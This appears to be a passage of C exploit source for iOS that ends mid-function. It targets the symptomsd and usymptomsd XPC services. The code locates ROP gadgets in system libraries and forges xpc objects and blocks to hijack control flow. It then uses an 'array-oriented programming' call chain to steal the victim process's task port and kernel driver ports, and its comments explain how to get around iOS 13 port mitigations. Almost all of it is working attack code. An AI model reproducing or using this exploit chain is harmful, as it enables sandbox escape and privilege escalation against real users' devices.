unsigned int mach_msg_guard_flags_t;\n\n/*#define MACH_MSG_GUARDED_PORT_DESCRIPTOR 4\n #pragma pack(4)\n typedef struct{\n uint64_t context;\n mach_msg_guard_flags_t flags : 16;\n mach_msg_type_name_t disposition : 8;\n mach_msg_descriptor_type_t type : 8;\n mach_port_name_t name;\n } mach_msg_guarded_port_descriptor_t;\n */\n\n#pragma mark - Pre-exploitation - Our Mach Server\n\nmach_port_t our_serverport = 0;\nvoid Prepare_our_Mach_server(){\n \n kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &our_serverport);\n if(our_serverport == 0){\n printf(\"Error occurred when mach_port_allocate: 0x%x!\\n\", kr);\n exit();\n }\n}\n\n#pragma mark - Pre-exploitation - dyldcache\n\nvoid *dylibcache_start = NULL;\nsize_t dylibcache_size = 0;\n\nbool isPartOf_dyldcache(vm_address_t addr){\n vm_size_t size = 0;\n natural_t depth = 0;\n vm_region_submap_info_data_64_t info;\n mach_msg_type_number_t info_cnt = VM_REGION_SUBMAP_INFO_COUNT_64;\n if(vm_region_recurse_64(mach_task_self(), &addr, &size, &depth, (vm_region_info_t)&info, &info_cnt))\n return false;\n if(info.share_mode == SM_TRUESHARED)\n return true;\n return false;\n}\n\nsize_t Get_loaded_dylib_size(void *dylib_address){\n \n struct mach_header *mh = (struct mach_header*)dylib_address;\n const uint32_t cmd_count = mh->ncmds;\n struct load_command *cmds = (struct load_command*)((char*)mh+sizeof(struct mach_header_64));\n struct load_command* cmd = cmds;\n for (uint32_t i = 0; i < cmd_count; ++i){\n switch (cmd->cmd) {\n case LC_SEGMENT_64:{\n struct segment_command_64 *seg = (struct segment_command_64*)cmd;\n if(!strcmp(seg->segname,\"__TEXT\")){\n return seg->vmsize;\n }\n }\n break;\n }\n cmd = (struct load_command*)((char*)cmd + cmd->cmdsize);\n }\n return 0;\n}\n\nvoid Find_dylibcache(){\n \n vm_address_t minAddr = 0;\n vm_address_t maxAddr = 0;\n \n for (uint32_t i = 0; i < _dyld_image_count(); i++){\n uint64_t addr = (uint64_t)_dyld_get_image_header(i);\n const char *name = _dyld_get_image_name(i);\n if(strncmp(name, \"/System/\", 8) && strncmp(name, \"/usr/\", 5))\n continue;\n if(!isPartOf_dyldcache(addr))\n continue;\n if(!minAddr || addr < minAddr)\n minAddr = addr;\n if(addr > maxAddr)\n maxAddr = addr;\n }\n \n if(!minAddr||!maxAddr){\n printf(\"dylibcache Not Ready!\\n\");\n exit();\n }\n \n size_t last_dylib_size = Get_loaded_dylib_size((void*)maxAddr);\n \n dylibcache_start = (void*)minAddr;\n dylibcache_size = (size_t)((maxAddr + last_dylib_size) - minAddr);\n \n printf(\"Dylibcache range: %p - %p\\n\", dylibcache_start, dylibcache_start + dylibcache_size);\n}\n\n#pragma mark - Pre-exploitation - arm64 ROP gadgets\n\nuint64_t find_gadget(char *bytes, size_t len){\n void *addr = memmem(dylibcache_start, dylibcache_size, bytes, len);\n if(!addr){\n printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n exit();\n }\n return (uint64_t)addr;\n}\n\nuint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_start, uint64_t findingRange_size){\n void *addr = memmem(findingRange_start, findingRange_size, bytes, len);\n if(!addr){\n printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n }\n return (uint64_t)addr;\n}\n\nchar _bytes_control_x0x2[] = {\n 0xF3, 0x03, 0x00, 0xAA, // mov x19, x0\n 0x08, 0x00, 0x42, 0xA9, // ldp x8, x0, [x0, #0x20]\n 0x61, 0x3A, 0x40, 0xB9, // ldr w1, [x19, #0x38]\n 0x62, 0x1A, 0x40, 0xF9, // ldr x2, [x19, #0x30]\n 0x00, 0x01, 0x3f, 0xd6, // blr x8\n}; // Found at CoreUtils`___WiFiSWAPStartCallBack_block_invoke: <+16>\n#define _Gadget_control_x0x2 find_gadget_speed(_bytes_control_x0x2,sizeof(_bytes_control_x0x2),findingRange_start,findingRange_size)\nuint64_t Gadget_control_x0x2 = 0;\n\nchar _bytes_memcopy[] = {\n 0x08, 0x00, 0x40, 0xB9, // ldr w8, [x0]\n 0x68, 0x00, 0x00, 0xB9, // str w8, [x3]\n 0xC0, 0x03, 0x5F, 0xD6, // ret\n}; // Found at libwebrtc.dylib`ScaleARGBRowDownEven_C: <+68>\n#define _Gadget_memcopy find_gadget_speed(_bytes_memcopy,sizeof(_bytes_memcopy),findingRange_start,findingRange_size)\nuint64_t Gadget_memcopy = 0;\n\n#define aop_FuncCALL(FUNC, ARG1, ARG2, ARG3, ARG4) \\\nspraymem[OF(_aop_FuncCALL_primer_offset)] = spray_start_address + _aop_FuncCALL_offset; \\\n{char *func_call_payload = ((char*)spraymem) + _aop_FuncCALL_offset; \\\n_aop_FuncCALL_primer_offset += 8; \\\n_aop_FuncCALL_offset += 0x74; \\\n*(uint32_t*)(func_call_payload + 20) = 53; \\\n*(uint64_t*)(func_call_payload) = 0; \\\n*(uint32_t*)(func_call_payload + 8) = 0; \\\nchar *tmp_ha = func_call_payload + 24; /* Saved an offset later gonna involves multiple time */ \\\n*(uint32_t*)(tmp_ha + 4) = 150; \\\n*(uint32_t*)(func_call_payload + 4) = 116; \\\n*(uint64_t*)(tmp_ha + 16) = FUNC; /* func ptr */ \\\n*(uint64_t*)(tmp_ha + 24) = ARG1; /* arg1 */ \\\n*(uint32_t*)(tmp_ha + 72) = ARG2; /* arg2 (Only 32bits)*/ \\\n*(uint64_t*)(tmp_ha + 76) = ARG3; /* arg3 */ \\\n*(uint64_t*)(tmp_ha + 84) = ARG4;} // arg4\n\n#define aop_FuncCALL_memcpy_32bits(dst, src) \\\naop_FuncCALL((void*)Gadget_memcopy, src, 0, 0, dst)\n\n#define aop_Insert_String(VAR, STR) \\\nsize_t _##VAR##_len = strlen(STR) + 1; \\\nuint64_t VAR = spray_start_address + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, STR, _##VAR##_len); \\\n_##VAR##_len = (~0xF) & (_##VAR##_len + 0xF); \\\n_aop_data_offset += _##VAR##_len;\n\n#define aop_Insert_Data(VAR, DATA, SIZE) \\\nsize_t _##VAR##_SIZE = SIZE; \\\nuint64_t VAR = spray_start_address + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, DATA, _##VAR##_SIZE); \\\n_##VAR##_SIZE = (~0xF) & (_##VAR##_SIZE + 0xF); \\\n_aop_data_offset += _##VAR##_SIZE;\n\nvoid Find_Gadgets_speed(){\n \n#define _SEEK(V) if(!(V = _##V)){printf(\"No \"#V\" Found!\\n\");exit(0);}\n \n const char *target_lib_1 = \"/System/Library/PrivateFrameworks/CoreUtils.framework/CoreUtils\";\n const char *target_lib_2 = \"/System/Library/PrivateFrameworks/WebCore.framework/Frameworks/libwebrtc.dylib\";\n \n dlopen(target_lib_1, RTLD_NOW);\n dlopen(target_lib_2, RTLD_NOW);\n \n for (uint32_t i = 0; i < _dyld_image_count(); i++){\n \n const char *name = _dyld_get_image_name(i);\n if(!strcmp(name, target_lib_1)){\n \n void *findingRange_start = (void*)_dyld_get_image_header(i);\n uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n _SEEK(Gadget_control_x0x2);\n }\n else if(!strcmp(name, target_lib_2)){\n \n void *findingRange_start = (void*)_dyld_get_image_header(i);\n uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n _SEEK(Gadget_memcopy);\n }\n }\n}\n\nuint32_t get_server_port(char *servername){\n // Can use for check connection as well\n uint32_t port = 0;\n bootstrap_look_up(bootstrap_port, servername, &port);\n if(!port){\n printf(\"%s lookup failed\\n\", servername);\n return 0;\n }\n printf(\"got server: 0x%x\\n\", port);\n return port;\n}\n\nvoid mach_msg_conn_test(){\n \n printf(\"w\\n\");\n mach_port_t server_port = get_server_port(\"\");\n printf(\"server_port: 0x%x\\n\", server_port);\n \n struct routine1_msg{\n mach_msg_header_t Head;\n mach_msg_body_t msgh_body;\n mach_msg_ool_descriptor_t ool;\n mach_msg_port_descriptor_t port;\n mach_msg_trailer_t trailer;\n };\n \n struct routine1_msg *msg = malloc(sizeof(struct routine1_msg));\n bzero(msg, sizeof(struct routine1_msg));\n \n mach_port_t reply_port = mig_get_reply_port();\n \n msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n msg->Head.msgh_size = 80;\n msg->Head.msgh_remote_port = server_port;\n msg->Head.msgh_local_port = reply_port;\n msg->Head.msgh_id = 0x6F0;\n msg->msgh_body.msgh_descriptor_count = 2;\n \n mach_port_t shared_port_parent;\n mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &shared_port_parent);\n \n msg->port.name = server_port;\n msg->port.disposition = MACH_MSG_TYPE_MOVE_SEND;\n msg->port.type = MACH_MSG_PORT_DESCRIPTOR;\n \n msg->ool.address = \"AAAAAAAAA\";\n msg->ool.size = 3;\n msg->ool.copy = MACH_MSG_VIRTUAL_COPY;\n msg->ool.deallocate = false;\n msg->ool.type = MACH_MSG_OOL_DESCRIPTOR;\n \n int rt = mach_msg(msg, MACH_SEND_MSG|MACH_RCV_MSG, msg->Head.msgh_size, sizeof(struct routine1_msg), reply_port, 0, 0);\n \n if(rt == 0){\n printf(\"reply: 0x%x\\n\", msg->Head.msgh_bits);\n printf(\"reply size: %d\\n\", msg->Head.msgh_size);\n \n printf(\"id: %d\\n\", msg->Head.msgh_id);\n \n }else{\n printf(\"msg err: 0x%x\\n\", rt);\n }\n}\n\nvoid click_test_main(){\n mach_msg_conn_test();\n}\n\nvoid xpc_conn_test(){\n \n xpc_connection_t ccc = xpc_connection_create_mach_service(\"com.apple.usymptomsd\", NULL, 0);\n xpc_connection_set_event_handler(ccc, ^(xpc_object_t object) {\n //printf(\"replyA\\n\");\n //char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n //printf(\"erra: %s\\n\", err);\n });\n xpc_connection_resume(ccc);\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n //xpc_dictionary_set_int64(msg, \"op\", 2);\n //xpc_dictionary_set_int64(msg, \"dat1\", 66);\n \n size_t payload_len = 0x1;\n char *payload = malloc(payload_len);\n \n xpc_dictionary_set_value(msg, \"payload\", xpc_data_create(payload, payload_len));\n \n xpc_connection_send_message_with_reply(ccc, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n \n pid_t server_pid = xpc_connection_get_pid(ccc);\n printf(\"server pid: %d\\n\", server_pid);\n \n //printf(\"replyB: %s\\n\", xpc_copy_description(object));\n \n });\n}\n\nvoid xpc_conn_test_exp1(){\n \n xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n //printf(\"replyA\\n\");\n //char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n //printf(\"erra: %s\\n\", err);\n });\n xpc_connection_resume(xpcconn);\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2/3\n \n xpc_object_t config_arr = xpc_array_create(NULL, 0);\n xpc_dictionary_set_value(msg, \"config\", config_arr);\n \n xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0);\n // Parse by -[ConfigurationHandler read:returnedValues:]\n xpc_array_append_value(config_arr, each_config);\n \n xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"com.apple.symptoms.test.request-passthrough\"); // [knownItems objectForKey: ???]\n \n xpc_object_t signature_arr = xpc_array_create(NULL, 0);\n xpc_dictionary_set_value(each_config, \"TRIGGERED_SIGNATURES\", signature_arr); // Enter -[SimpleSymptomEvaluator configureInstance:]\n \n xpc_object_t each_signature = xpc_dictionary_create(NULL, NULL, 0);\n xpc_array_append_value(signature_arr, each_signature);\n \n xpc_dictionary_set_string(each_signature, \"SIGNATURE_NAME\", \"HAHA\");\n \n xpc_dictionary_set_string(each_signature, \"SYNDROME_NAME\", \"HAHA2\");\n xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_GENERATOR\", \"CertificateErrors\");\n xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_SELECTOR\", \"conditionMinCount\");\n \n xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n \n //printf(\"replyB: %s\\n\", xpc_copy_description(object));\n \n });\n}\n\nvoid xpc_conn_test_forTrigger(){\n \n xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n //printf(\"replyA\\n\");\n });\n xpc_connection_resume(xpcconn);\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2/3\n \n xpc_object_t config_arr = xpc_array_create(NULL, 0);\n xpc_dictionary_set_value(msg, \"config\", config_arr);\n \n xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0); // Parse by -[ConfigurationHandler read:returnedValues:]\n xpc_array_append_value(config_arr, each_config);\n \n xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"CertificateErrors\"); // [knownItems objectForKey: ???]\n \n xpc_dictionary_set_string(each_config, \"REQUIRED_MINIMUM_COUNT\", \"5637210112\"); // Turn SPRAY_ADDRESS to Decimal\n \n xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n //printf(\"replyB: %s\\n\", xpc_copy_description(object));\n });\n}\n\n// Look up service: com.apple.usymptomsd\nuint8_t bootstrap_look_up_machmsg_bytes[244] = {0x13,0x15,0x13,0x0,0xf4,0x0,0x0,0x0,0x7,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x43,0x50,0x58,0x40,0x5,0x0,0x0,0x0,0x0,0xf0,0x0,0x0,0xcc,0x0,0x0,0x0,0x8,0x0,0x0,0x0,0x73,0x75,0x62,0x73,0x79,0x73,0x74,0x65,0x6d,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x5,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x68,0x61,0x6e,0x64,0x6c,0x65,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x69,0x6e,0x73,0x74,0x61,0x6e,0x63,0x65,0x0,0x0,0x0,0x0,0x0,0xa0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x72,0x6f,0x75,0x74,0x69,0x6e,0x65,0x0,0x0,0x40,0x0,0x0,0xcf,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x66,0x6c,0x61,0x67,0x73,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x6e,0x61,0x6d,0x65,0x0,0x0,0x0,0x0,0x0,0x90,0x0,0x0,0x15,0x0,0x0,0x0,0x63,0x6f,0x6d,0x2e,0x61,0x70,0x70,0x6c,0x65,0x2e,0x75,0x73,0x79,0x6d,0x70,0x74,0x6f,0x6d,0x73,0x64,0x0,0x0,0x0,0x0,0x74,0x79,0x70,0x65,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x61,0x72,0x67,0x65,0x74,0x70,0x69,0x64,0x0,0x0,0x0,0x0,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nuint8_t vm_remap_machmsg_bytes[92] = {0x13,0x15,0x0,0x80,0x5c,0x0,0x0,0x0,0x11,0x11,0x11,0x11,0x22,0x22,0x22,0x22,0x0,0x0,0x0,0x0,0xcd,0x12,0x0,0x0,0x1,0x0,0x0,0x0,0x3,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x13,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x33,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xf,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x40,0x0,0x0,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nvoid Assemble_part2_AOP(uint64_t *spraymem, uint64_t spray_start_address){\n \n // Trigger vuln causing call objc_release with fake_xpcobj\n char *fake_xpcobj = (char*)spraymem;\n *(uint64_t*)fake_xpcobj = (uint64_t)dlsym((void*)-2, \"_xpc_type_file_transfer\");\n *(uint32_t*)(fake_xpcobj + 0xC) = 0; // set retainCnt as 0, leads to _xpc_file_transfer_dispose\n *(uint64_t*)(fake_xpcobj + 0x40) = spray_start_address + 0x48; // leads to _Block_release during disposal\n \n char *fake_Block = ((char*)spraymem) + 0x48;\n char *fake_Block_core = fake_Block + 0x40;\n \n *(uint32_t*)(fake_Block + 0x8) = 0x3000000 | 0x2; // Necessary bits mask | retainCnt\n *(uint64_t*)(fake_Block + 0x18) = (uint64_t)spray_start_address + 0x48 + 0x40;\n \n // First place got control of PC\n *(uint64_t*)(fake_Block_core + 0x18) = Gadget_control_x0x2;\n \n // --- Execute control_x0x2 gadget\n *(uint64_t*)(fake_Block + 0x20) = (uint64_t)dlsym((void*)-2, \"xpc_array_apply_f\"); // Next jmp\n *(uint64_t*)(fake_Block + 0x28) = spray_start_address + 0x100 - 24; // Reset x0, point to our spray mem, explicitly, a crafted xpc array\n *(uint64_t*)(fake_Block + 0x30) = (uint64_t)IODispatchCalloutFromMessage; // Reset x2\n *(uint64_t*)(fake_Block + 0x38) = 0x0; // Reset w1 (Only 32bit)\n \n /*\n Begin Array-Oriented-Programming function chain-calling\n \n Payload arrangement:\n \n 0x0\n ... Used during taking control of PC\n 0x100\n ... AOP array object itself\n 0x118\n ... For AOP data-use\n 0x1500\n ... For AOP call-use\n 0x3E00\n ... AOP array storage\n 0x4000\n */\n \n uint32_t _aop_FuncCALL_primer_offset = 0x3E00;\n uint32_t _aop_FuncCALL_offset = 0x1800;\n uint32_t _aop_data_offset = 0x118; // offset is right after fake array\n \n // Craft a fake array, stru has changed and req size increased to 0x18 since iOS13, was 0x10\n spraymem[OF(0x100)] = spray_start_address + _aop_FuncCALL_primer_offset; // Array internal pointer, point to stored objects pool\n spraymem[OF(0x108)] = -1; // Array count, -1 causes the array to iterate endlessly -1\n spraymem[OF(0x110)] = 0; // new value introd since iOS13, keep it empty\n \n // --- Following are AOP data-use\n \n aop_Insert_Data(lookup_io_server_rawmsg, bootstrap_look_up_machmsg_bytes, sizeof(bootstrap_look_up_machmsg_bytes));\n *(uint64_t*)(vm_remap_machmsg_bytes + 56) = 0x4000000; // size of iosurface\n aop_Insert_Data(vm_remap_rawmsg, vm_remap_machmsg_bytes, sizeof(vm_remap_machmsg_bytes));\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_local_port: +12\n mach_msg_body_t msgh_body;\n mach_msg_port_descriptor_t our_recv_port;\n // our_recv_port.name: +28\n mach_msg_port_descriptor_t our_task_port;\n // our_task_port.name: +40\n mach_msg_port_descriptor_t IOSurfaceRoot_servport;\n // IOSurfaceRoot_servport.name: +52\n mach_msg_port_descriptor_t AppleAVE2Driver_servport;\n // AppleAVE2Driver_servport.name: +64\n mach_msg_trailer_t trailer;\n }_remote_recvmsg = {0}; // Size: 84\n _remote_recvmsg.Head.msgh_size = sizeof(_remote_recvmsg);\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_local_port: +12\n mach_msg_trailer_t trailer;\n }_remote_recvmsg2 = {0}; // Size: 32\n _remote_recvmsg2.Head.msgh_size = sizeof(_remote_recvmsg2);\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_local_port: +12\n uint64_t remote_map_addr;\n // remote_map_addr: +24\n mach_msg_trailer_t trailer;\n }_remote_recvmsg3 = {0}; // Size: 56\n _remote_recvmsg3.Head.msgh_size = sizeof(_remote_recvmsg3);\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_remote_port +8\n mach_msg_body_t msgh_body;\n mach_msg_port_descriptor_t port_send_to_us;\n // port_send_to_us.name +28\n }_remote_sendmsg = {0};\n _remote_sendmsg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n _remote_sendmsg.Head.msgh_size = sizeof(_remote_sendmsg);\n _remote_sendmsg.msgh_body.msgh_descriptor_count = 1;\n _remote_sendmsg.port_send_to_us.name = mach_task_self();\n _remote_sendmsg.port_send_to_us.disposition = MACH_MSG_TYPE_MOVE_SEND;\n _remote_sendmsg.port_send_to_us.type = MACH_MSG_PORT_DESCRIPTOR;\n \n struct {\n mach_msg_header_t Head;\n }_remote_sendmsg2 = {0};\n _remote_sendmsg2.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n _remote_sendmsg2.Head.msgh_size = sizeof(_remote_sendmsg2);\n \n struct {\n mach_msg_header_t Head;\n uint64_t send_remap_addr_to_us;\n // send_remap_addr_to_us: +24\n }_remote_sendmsg3 = {0};\n _remote_sendmsg3.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n _remote_sendmsg3.Head.msgh_size = sizeof(_remote_sendmsg3);\n \n aop_Insert_Data(remote_recvmsg, &_remote_recvmsg, sizeof(_remote_recvmsg));\n aop_Insert_Data(remote_recvmsg2, &_remote_recvmsg2, sizeof(_remote_recvmsg2));\n aop_Insert_Data(remote_recvmsg3, &_remote_recvmsg3, sizeof(_remote_recvmsg3));\n aop_Insert_Data(remote_sendmsg, &_remote_sendmsg, sizeof(_remote_sendmsg));\n aop_Insert_Data(remote_sendmsg2, &_remote_sendmsg2, sizeof(_remote_sendmsg2));\n aop_Insert_Data(remote_sendmsg3, &_remote_sendmsg3, sizeof(_remote_sendmsg3));\n \n // --- Following are AOP code-use\n \n // Call bootstrap_look_up to retri listening port\n aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, lookup_io_server_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n aop_FuncCALL(mach_msg_send, lookup_io_server_rawmsg, 0, 0, 0);\n aop_FuncCALL(mach_msg_receive, lookup_io_server_rawmsg, 0, 0, 0);\n \n aop_FuncCALL_memcpy_32bits(remote_recvmsg + offsetof(mach_msg_header_t, msgh_local_port), lookup_io_server_rawmsg + 28);\n aop_FuncCALL(mach_msg_receive, remote_recvmsg, 0, 0, 0);\n aop_FuncCALL_memcpy_32bits(remote_recvmsg2+12, remote_recvmsg+12);\n aop_FuncCALL_memcpy_32bits(remote_recvmsg3+12, remote_recvmsg+12);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg+8, remote_recvmsg+28);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg2+8, remote_recvmsg+28);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg3+8, remote_recvmsg+28);\n \n aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+8, remote_recvmsg+40);\n aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, vm_remap_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n \n aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0); // To inform us that pwned proc got the msg contains our port\n \n // Then passing own task port to us\n aop_FuncCALL(mach_msg_send, remote_sendmsg, 0, 0, 0);\n /*\n Reason of doing this, instead like in iOS12 exploit, open IO service port via IOServiceOpen and passing to us directly.\n iOS 13 added new mitigation prevent all IOUserClient (obtain via IOServiceOpen) port from moving to other ipc space, namely diff tasks.\n \n I supposed these port are marked as guarded port.\n \n Example crash:\n Exception Type: EXC_GUARD\n Exception Subtype: GUARD_TYPE_MACH_PORT\n Exception Message: on mach port 84999 (guarded with 0x0000000000000000)\n Exception Note: SIMULATED (this is NOT a crash)\n \n Way to get around this is \"passively\" passing to us, like use task_get_special_port/task_set_special_port trick\n */\n \n // Opening and passing kernel driver ports to us.\n aop_FuncCALL_memcpy_32bits(spray_start_address + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+52);\n aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n \n aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_SEATBELT_PORT, 0x414141, 0);\n aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0); // Waiting for us to notify pwned proc we got the port\n \n aop_FuncCALL_memcpy_32bits(spray_start_address + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+64);\n aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n \n aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_ACCESS_PORT, 0x414141, 0);\n aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n \n // Waiting for overwriting over the iosurface mapping memory, key to trigger vulnerability in kernel\n aop_FuncCALL(mach_msg_receive, remote_recvmsg3, 0, 0, 0);\n \n // Perform cross-task memory mapping\n aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+76, remote_recvmsg3+24);\n aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+80, remote_recvmsg3+28); // src addr which is the remote mapping addr\n aop_FuncCALL(mach_msg_send, vm_remap_rawmsg, 0, 0, 0);\n aop_FuncCALL(mach_msg_receive, vm_remap_rawmsg, 0, 0, 0);\n \n // send remap addr to us\n aop_FuncCALL_memcpy_32bits(remote_sendmsg3+24, vm_remap_rawmsg+36);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg3+28, vm_remap_rawmsg+40); // src addr which is the remote mapping addr\n aop_FuncCALL(mach_msg_send, remote_sendmsg3, 0, 0, 0);\n \n // Block here to waiting for finish exploitation\n aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0);\n \n // Duty completed\n aop_FuncCALL(exit, 0, 0, 0, 0);\n \n //printf(\"_aop_data_offset: 0x%x\\n\", _aop_data_offset);\n //printf(\"_aop_FuncCALL_offset: 0x%x\\n\", _aop_FuncCALL_offset);\n //printf(\"_aop_FuncCALL_primer_offset: 0x%x\\n\", _aop_FuncCALL_primer_offset);\n}\n\nvoid Assemble_part1_ROP(uint64_t *rop2_stack, uint64_t rop2_start_address){\n // Still need little bit ROP to convert \"retain\" call into \"release\", from that point on, AOP gadget can be re-used\n \n rop2_stack[OF(0x0)] = rop2_start_address + 0x40;\n \n rop2_stack[OF(0x20)] = (uint64_t)dlsym((void*)-2, \"objc_release\"); // Next JMP\n rop2_stack[OF(0x28)] = rop2_start_address + 0x80; // Reset x0\n \n rop2_stack[OF(0x50)] = *rop2_stack + 0x28;\n rop2_stack[OF(0x58)] = 0;\n rop2_stack[OF(0x60)] = 0;\n rop2_stack[OF(0x68)] = *rop2_stack ^ Gadget_control_x0x2; // Again take over PC\n rop2_stack[OF(0x70)] = (uint64_t)sel_registerName(\"retain\");\n \n Assemble_part2_AOP((uint64_t *)((char*)rop2_stack + 0x80), rop2_start_address + 0x80);\n}\n\nvoid xpc_conn_test_exp2(){\n \n xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.usymptomsd\", NULL, 0);\n xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n printf(\"replyA\\n\");\n char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n printf(\"erra: %s\\n\", err);\n });\n xpc_connection_resume(xpcconn);\n \n size_t payload_size = 8 + 72 + 100 + 6; // payload head + 1st tlv length + 1st tlv body + beginning of 2nd tlv (To break the loop)\n char *payload = malloc(payload_size);\n bzero(payload, payload_size);\n \n // 4 + 72 + (>3)\n // _eventData: 4 ~ 72\n \n *(uint16_t*)payload = 2; // case ? for switch statement\n *(uint16_t*)(payload + 2) = 72; // len for SYMTLV_SYM_BASIC\n *(uint8_t*)(payload + 11) = 0x40; // Do not let it passes: if ( !(*(_BYTE *)(payload + 11) & 0x40) )\n *(uint16_t*)(payload + 72 + 4) = 8; // Do not let it passes: if ( *(_WORD *)(payload_ing_inner + *(uint16_t*)(payload + 2) + 4) != 8 )\n \n char *payload_inner = payload + 72 + 4;\n \n *(uint16_t*)(payload_inner + 2) = 100; // v45\n // Do not let these pass: if ( v45 & 3 )\n // if ( payload_remain_len < v45 + 4 ) //payload_remain_len: payload_size - 72 - 4\n // if ( (unsigned int)v45 <= 11 )\n // if ( v47 + 8 > v45 ) //v47: *(uint32_t*)(payload_inner + 8)\n *(uint32_t*)(payload_inner + 8) = 100 - 8; // provided EventKey max length\n *(uint32_t*)(payload_inner + 4) = 0xFFFFFFFF; // Must let it passes: if( _bittest((int*)(payload_inner + 4), 29u) )\n strcpy(payload_inner + 12, \"com.apple.symptoms.test.request-passthrough\");\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n xpc_dictionary_set_data(msg, \"payload\", payload, payload_size);\n \n \n 